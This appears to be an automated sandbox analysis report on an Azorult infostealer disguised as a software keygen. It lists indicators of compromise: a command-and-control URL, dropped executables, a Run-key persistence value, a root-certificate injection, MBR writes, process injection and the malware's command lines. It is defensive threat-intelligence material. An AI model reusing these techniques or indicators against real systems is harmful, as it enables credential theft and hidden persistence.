azorult | 1bf6d14c4b5f59aa30882f4aa25e9e9d703dac905a785fe020ff667600e5fc97

Analysis

max time kernel
235s
max time network
286s
platform
windows10_x64
resource
win10v20201028
submitted
18/11/2020, 15:58 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe

Score

10^/10

azorult bootkit evasion infostealer macro persistence spyware stealer trojan upx xlm

Malware Config

Extracted

Family

azorult

http://kvaka.li/1210776429.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Nirsoft 8 IoCs

resource	yara_rule
behavioral15/files/0x000300000001abe6-77.dat	Nirsoft
behavioral15/files/0x000300000001abe6-78.dat	Nirsoft
behavioral15/files/0x000200000001ac07-95.dat	Nirsoft
behavioral15/files/0x000200000001ac07-94.dat	Nirsoft
behavioral15/files/0x000400000001ac07-102.dat	Nirsoft
behavioral15/files/0x000400000001ac07-103.dat	Nirsoft
behavioral15/files/0x000600000001ac07-111.dat	Nirsoft
behavioral15/files/0x000600000001ac07-110.dat	Nirsoft

Executes dropped EXE 21 IoCs

pid	Process
1532	intro.exe
1176	keygen-pr.exe
3376	keygen-step-1.exe
2260	keygen-step-4.exe
3660	key.exe
1612	002.exe
392	Setup.exe
1344	setup.exe
3732	aliens.exe
3828	jg2_2qua.exe
2152	97535F5358BB4449.exe
2796	97535F5358BB4449.exe
1404	1605719246877.exe
3928	hjjgaa.exe
3388	jfiag_gg.exe
1328	1605719251924.exe
2192	1605719258783.exe
3904	1605719261580.exe
4076	jfiag_gg.exe
3212	CBBEDF528F97C51A.exe
2292	CBBEDF528F97C51A.tmp

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

macro xlm

resource	yara_rule
behavioral15/files/0x000100000001abe1-54.dat	office_xlm_macros

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral15/files/0x000600000001abe0-87.dat	upx
behavioral15/files/0x000600000001abe0-86.dat	upx
behavioral15/files/0x000600000001abe0-132.dat	upx
behavioral15/files/0x000600000001abe0-131.dat	upx

Loads dropped DLL 4 IoCs

pid	Process
392	Setup.exe
392	Setup.exe
392	Setup.exe
184	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe"	hjjgaa.exe

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	aliens.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jg2_2qua.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	97535F5358BB4449.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
46	ip-api.com

Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	97535F5358BB4449.exe
File opened for modification	\??\PhysicalDrive0	aliens.exe
File opened for modification	\??\PhysicalDrive0	97535F5358BB4449.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
3732	aliens.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2152 set thread context of 744	2152	97535F5358BB4449.exe	100
PID 2152 set thread context of 3832	2152	97535F5358BB4449.exe	111
PID 2152 set thread context of 1396	2152	97535F5358BB4449.exe	113
PID 2152 set thread context of 3364	2152	97535F5358BB4449.exe	115

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\dz7d9shn0mvi	setup.exe
File created	C:\Program Files (x86)\dz7d9shn0mvi\__tmp_rar_sfx_access_check_259424125	setup.exe
File created	C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe	setup.exe
File opened for modification	C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe	setup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	97535F5358BB4449.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	97535F5358BB4449.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	97535F5358BB4449.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	97535F5358BB4449.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	97535F5358BB4449.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc	97535F5358BB4449.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2256	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	aliens.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	aliens.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
2760	PING.EXE
3244	PING.EXE
2984	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1404	1605719246877.exe
1404	1605719246877.exe
1328	1605719251924.exe
1328	1605719251924.exe
2192	1605719258783.exe
2192	1605719258783.exe
3904	1605719261580.exe
3904	1605719261580.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
4076	jfiag_gg.exe
4076	jfiag_gg.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe
2152	97535F5358BB4449.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeManageVolumePrivilege	3828	jg2_2qua.exe
Token: SeShutdownPrivilege	2828	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2828	msiexec.exe
Token: SeSecurityPrivilege	2784	msiexec.exe
Token: SeCreateTokenPrivilege	2828	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2828	msiexec.exe
Token: SeLockMemoryPrivilege	2828	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2828	msiexec.exe
Token: SeMachineAccountPrivilege	2828	msiexec.exe
Token: SeTcbPrivilege	2828	msiexec.exe
Token: SeSecurityPrivilege	2828	msiexec.exe
Token: SeTakeOwnershipPrivilege	2828	msiexec.exe
Token: SeLoadDriverPrivilege	2828	msiexec.exe
Token: SeSystemProfilePrivilege	2828	msiexec.exe
Token: SeSystemtimePrivilege	2828	msiexec.exe
Token: SeProfSingleProcessPrivilege	2828	msiexec.exe
Token: SeIncBasePriorityPrivilege	2828	msiexec.exe
Token: SeCreatePagefilePrivilege	2828	msiexec.exe
Token: SeCreatePermanentPrivilege	2828	msiexec.exe
Token: SeBackupPrivilege	2828	msiexec.exe
Token: SeRestorePrivilege	2828	msiexec.exe
Token: SeShutdownPrivilege	2828	msiexec.exe
Token: SeDebugPrivilege	2828	msiexec.exe
Token: SeAuditPrivilege	2828	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2828	msiexec.exe
Token: SeChangeNotifyPrivilege	2828	msiexec.exe
Token: SeRemoteShutdownPrivilege	2828	msiexec.exe
Token: SeUndockPrivilege	2828	msiexec.exe
Token: SeSyncAgentPrivilege	2828	msiexec.exe
Token: SeEnableDelegationPrivilege	2828	msiexec.exe
Token: SeManageVolumePrivilege	2828	msiexec.exe
Token: SeImpersonatePrivilege	2828	msiexec.exe
Token: SeCreateGlobalPrivilege	2828	msiexec.exe
Token: SeCreateTokenPrivilege	2828	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2828	msiexec.exe
Token: SeLockMemoryPrivilege	2828	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2828	msiexec.exe
Token: SeMachineAccountPrivilege	2828	msiexec.exe
Token: SeTcbPrivilege	2828	msiexec.exe
Token: SeSecurityPrivilege	2828	msiexec.exe
Token: SeTakeOwnershipPrivilege	2828	msiexec.exe
Token: SeLoadDriverPrivilege	2828	msiexec.exe
Token: SeSystemProfilePrivilege	2828	msiexec.exe
Token: SeSystemtimePrivilege	2828	msiexec.exe
Token: SeProfSingleProcessPrivilege	2828	msiexec.exe
Token: SeIncBasePriorityPrivilege	2828	msiexec.exe
Token: SeCreatePagefilePrivilege	2828	msiexec.exe
Token: SeCreatePermanentPrivilege	2828	msiexec.exe
Token: SeBackupPrivilege	2828	msiexec.exe
Token: SeRestorePrivilege	2828	msiexec.exe
Token: SeShutdownPrivilege	2828	msiexec.exe
Token: SeDebugPrivilege	2828	msiexec.exe
Token: SeAuditPrivilege	2828	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2828	msiexec.exe
Token: SeChangeNotifyPrivilege	2828	msiexec.exe
Token: SeRemoteShutdownPrivilege	2828	msiexec.exe
Token: SeUndockPrivilege	2828	msiexec.exe
Token: SeSyncAgentPrivilege	2828	msiexec.exe
Token: SeEnableDelegationPrivilege	2828	msiexec.exe
Token: SeManageVolumePrivilege	2828	msiexec.exe
Token: SeImpersonatePrivilege	2828	msiexec.exe
Token: SeCreateGlobalPrivilege	2828	msiexec.exe
Token: SeCreateTokenPrivilege	2828	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2828	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2828	msiexec.exe

Suspicious use of SetWindowsHookEx 15 IoCs

pid	Process
1612	002.exe
1612	002.exe
392	Setup.exe
1344	setup.exe
3732	aliens.exe
2152	97535F5358BB4449.exe
2796	97535F5358BB4449.exe
744	firefox.exe
1404	1605719246877.exe
3832	firefox.exe
1328	1605719251924.exe
1396	firefox.exe
2192	1605719258783.exe
3364	firefox.exe
3904	1605719261580.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 412 wrote to memory of 212	412	Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe	78
PID 412 wrote to memory of 212	412	Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe	78
PID 412 wrote to memory of 212	412	Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe	78
PID 212 wrote to memory of 1532	212	cmd.exe	81
PID 212 wrote to memory of 1532	212	cmd.exe	81
PID 212 wrote to memory of 1532	212	cmd.exe	81
PID 212 wrote to memory of 1176	212	cmd.exe	82
PID 212 wrote to memory of 1176	212	cmd.exe	82
PID 212 wrote to memory of 1176	212	cmd.exe	82
PID 212 wrote to memory of 3376	212	cmd.exe	83
PID 212 wrote to memory of 3376	212	cmd.exe	83
PID 212 wrote to memory of 3376	212	cmd.exe	83
PID 212 wrote to memory of 2260	212	cmd.exe	84
PID 212 wrote to memory of 2260	212	cmd.exe	84
PID 212 wrote to memory of 2260	212	cmd.exe	84
PID 1176 wrote to memory of 3660	1176	keygen-pr.exe	85
PID 1176 wrote to memory of 3660	1176	keygen-pr.exe	85
PID 1176 wrote to memory of 3660	1176	keygen-pr.exe	85
PID 2260 wrote to memory of 1612	2260	keygen-step-4.exe	86
PID 2260 wrote to memory of 1612	2260	keygen-step-4.exe	86
PID 2260 wrote to memory of 1612	2260	keygen-step-4.exe	86
PID 3660 wrote to memory of 3716	3660	key.exe	87
PID 3660 wrote to memory of 3716	3660	key.exe	87
PID 3660 wrote to memory of 3716	3660	key.exe	87
PID 2260 wrote to memory of 392	2260	keygen-step-4.exe	88
PID 2260 wrote to memory of 392	2260	keygen-step-4.exe	88
PID 2260 wrote to memory of 392	2260	keygen-step-4.exe	88
PID 392 wrote to memory of 1344	392	Setup.exe	89
PID 392 wrote to memory of 1344	392	Setup.exe	89
PID 392 wrote to memory of 1344	392	Setup.exe	89
PID 1344 wrote to memory of 3732	1344	setup.exe	90
PID 1344 wrote to memory of 3732	1344	setup.exe	90
PID 1344 wrote to memory of 3732	1344	setup.exe	90
PID 2260 wrote to memory of 3828	2260	keygen-step-4.exe	91
PID 2260 wrote to memory of 3828	2260	keygen-step-4.exe	91
PID 2260 wrote to memory of 3828	2260	keygen-step-4.exe	91
PID 3732 wrote to memory of 2828	3732	aliens.exe	92
PID 3732 wrote to memory of 2828	3732	aliens.exe	92
PID 3732 wrote to memory of 2828	3732	aliens.exe	92
PID 3732 wrote to memory of 2152	3732	aliens.exe	94
PID 3732 wrote to memory of 2152	3732	aliens.exe	94
PID 3732 wrote to memory of 2152	3732	aliens.exe	94
PID 3732 wrote to memory of 2796	3732	aliens.exe	95
PID 3732 wrote to memory of 2796	3732	aliens.exe	95
PID 3732 wrote to memory of 2796	3732	aliens.exe	95
PID 2784 wrote to memory of 184	2784	msiexec.exe	96
PID 2784 wrote to memory of 184	2784	msiexec.exe	96
PID 2784 wrote to memory of 184	2784	msiexec.exe	96
PID 3732 wrote to memory of 580	3732	aliens.exe	97
PID 3732 wrote to memory of 580	3732	aliens.exe	97
PID 3732 wrote to memory of 580	3732	aliens.exe	97
PID 580 wrote to memory of 2760	580	cmd.exe	99
PID 580 wrote to memory of 2760	580	cmd.exe	99
PID 580 wrote to memory of 2760	580	cmd.exe	99
PID 2152 wrote to memory of 744	2152	97535F5358BB4449.exe	100
PID 2152 wrote to memory of 744	2152	97535F5358BB4449.exe	100
PID 2152 wrote to memory of 744	2152	97535F5358BB4449.exe	100
PID 2152 wrote to memory of 744	2152	97535F5358BB4449.exe	100
PID 2152 wrote to memory of 744	2152	97535F5358BB4449.exe	100
PID 2152 wrote to memory of 744	2152	97535F5358BB4449.exe	100
PID 2796 wrote to memory of 1784	2796	97535F5358BB4449.exe	101
PID 2796 wrote to memory of 1784	2796	97535F5358BB4449.exe	101
PID 2796 wrote to memory of 1784	2796	97535F5358BB4449.exe	101
PID 1784 wrote to memory of 2256	1784	cmd.exe	103

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:708
- C:\Windows\TEMP\CBBEDF528F97C51A.exe
  C:\Windows\TEMP\CBBEDF528F97C51A.exe
  2⤵
  - Executes dropped EXE
  PID:3212
- - C:\Users\Admin\AppData\Local\Temp\is-AAAM3.tmp\CBBEDF528F97C51A.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-AAAM3.tmp\CBBEDF528F97C51A.tmp" /SL5="$B005A,761193,121344,C:\Windows\TEMP\CBBEDF528F97C51A.exe"
    3⤵
    - Executes dropped EXE
    PID:2292

C:\Users\Admin\AppData\Local\Temp\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
"C:\Users\Admin\AppData\Local\Temp\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:412
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:212
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
    intro.exe 1O5ZF
    3⤵
    - Executes dropped EXE
    PID:1532
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1176
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3660
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        
        PID:3716
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:3376
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2260
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:1612
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:392
    - - C:\Users\Admin\AppData\Local\Temp\sib7609.tmp\0\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sib7609.tmp\0\setup.exe" -s
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1344
      - C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
        
        "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
        6⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Modifies system certificate store
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3732
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
        7⤵
        Enumerates connected drives
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:2828
        
        C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
        
        C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 0011 installp1
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Writes to the Master Boot Record (MBR)
        Suspicious use of SetThreadContext
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2152
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:744
        
        C:\Users\Admin\AppData\Roaming\1605719246877.exe
        
        "C:\Users\Admin\AppData\Roaming\1605719246877.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605719246877.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1404
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3832
        
        C:\Users\Admin\AppData\Roaming\1605719251924.exe
        
        "C:\Users\Admin\AppData\Roaming\1605719251924.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605719251924.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:1328
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:1396
        
        C:\Users\Admin\AppData\Roaming\1605719258783.exe
        
        "C:\Users\Admin\AppData\Roaming\1605719258783.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605719258783.txt"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2192
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe"
        8⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3364
        
        C:\Users\Admin\AppData\Roaming\1605719261580.exe
        
        "C:\Users\Admin\AppData\Roaming\1605719261580.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605719261580.txt"
        8⤵
